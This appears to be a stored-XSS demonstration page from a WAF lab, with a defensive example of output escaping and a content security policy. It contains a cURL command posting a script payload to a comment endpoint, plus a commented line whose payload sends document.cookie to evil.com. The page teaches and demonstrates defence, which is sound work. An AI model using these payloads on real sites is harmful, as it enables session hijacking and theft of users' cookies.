Cross-Site Scripting (XSS)

A03:2021 - Stored XSS attacks

What is Cross-Site Scripting (XSS)?

XSS flaws occur whenever an application includes untrusted data in a web page without proper validation or escaping. Stored XSS persists on the server and executes for all users who view the content.

Common Exploits:

  • Steal session cookies with document.cookie
  • Keylogging user input on the page
  • Phishing attacks modifying page content
  • Redirect users to malicious sites
  • Execute actions on behalf of the user

Before WAF: Vulnerable

Without Cloudflare WAF, XSS payloads execute in visitors' browsers

Post XSS Payload:

Or use cURL:

# Store XSS payload
curl -X POST "<your-worker-url>/api/comment" \
  -H "Content-Type: application/json" \
  -d '{"content":"<script>alert(\"XSS\")</script>"}'

# Script executes when anyone views comments!
# Steal cookies: <script>fetch('evil.com?c='+document.cookie)</script>

Vulnerability: User input stored and rendered without HTML sanitization.
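As an added illustration of the fix for the vulnerability just described (not the lab's own Worker code), the snippet below shows the raw-concatenation rendering beside an output-encoded version, with the payload from the cURL request above as a constructed stored comment. The `renderComment*`, `containsScriptTag` and `responseHeaders` helpers are hypothetical names.

```javascript
// Added example, not part of the lab: encode untrusted comment fields at the
// point where they are written into HTML, so stored payloads render as text.

// Every character that can break out of HTML text or attribute context.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
};

// Output encoding: untrusted text becomes inert text in the HTML body.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable rendering, as in the lab: stored content is concatenated raw.
function renderCommentUnsafe(comment) {
  return `<li><b>${comment.user}</b> ${comment.ts}: ${comment.content}</li>`;
}

// Hardened rendering: every untrusted field is escaped on output.
function renderCommentSafe(comment) {
  return `<li><b>${escapeHtml(comment.user)}</b> ${escapeHtml(comment.ts)}: ` +
    `${escapeHtml(comment.content)}</li>`;
}

// Simple regression check: does the rendered HTML still contain a <script>
// element that the browser would execute?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Defence in depth for the HTML response: a CSP that disallows inline script
// limits the damage if an encoding bug slips through (hypothetical helper).
function responseHeaders() {
  return {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    "X-Content-Type-Options": "nosniff",
  };
}

// Constructed sample: the payload from the cURL request above, as stored.
const SAMPLE_COMMENT = {
  user: "john_doe",
  ts: "2/19/2026, 1:16:58 AM",
  content: '<script>alert("XSS")</script>',
};
```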

Comments (XSS Executes Here)

View stored comments - scripts will execute!

  • john_doe (2/19/2026, 1:16:58 AM):
  • john_doe (2/19/2026, 12:13:28 AM):
  • john_doe (2/19/2026, 12:13:12 AM):
  • grace_hopper (2/18/2026, 11:53:28 PM): Just completed my security training!
  • frank_castle (2/18/2026, 11:38:28 PM): The admin page is at /admin
  • eve_online (2/18/2026, 11:08:28 PM): Testing the comment system.
  • diana_prince (2/18/2026, 6:08:28 PM): Found a vulnerability!
  • charlie_day (2/18/2026, 12:08:28 PM): Can someone help me with authentication?